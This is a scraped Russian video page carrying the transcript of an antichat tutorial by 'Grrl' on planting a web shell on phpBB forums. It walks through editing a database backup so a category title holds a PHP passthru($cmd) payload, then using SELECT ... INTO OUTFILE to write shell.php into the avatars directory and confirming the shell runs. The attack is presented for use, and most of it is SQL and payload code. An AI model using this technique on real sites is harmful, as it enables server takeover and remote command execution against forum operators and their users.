Monday, 22 June, 2026г.
russian english deutsch french spanish portuguese czech greek georgian chinese japanese korean indonesian turkish thai uzbek

пример: покупка автомобиля в Запорожье

 

Как залить шелл на форумы phpBB. Video.antichat - Grrl

Как залить шелл на форумы phpBB. Video.antichat - GrrlУ вашего броузера проблема в совместимости с HTML5
Привет)) меня зовут Grrl счас я покажу как залить шелл на форумы phpBB на примере локалхоста)))) для начала идем а админку и делаем полную копию базы данных отлично))) теперь нам нужно узнать установочную директорию форума))) /admin/admin_disallow.php?setmodules=1 вот тут он и находится) а теперь подправим сворованную базу данных)) находим такую строку INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10'); и заменяем ее на следующее INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', ' ? passthru("$cmd"); ? ', '10'); SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; здесь придется подправить когда будешь заливать на другой хосст)) можно мыло бы попробовать залить и в chace но посмотрим туда вначале поэтому заливаем в папку аватарок (если туда разрешенна запись кстественно) восстававливаем базу база востановленна))) теперь проверяем наш шел он как видим работает )))) всё!!!!! http://forum.antichat.ru
Мой аккаунт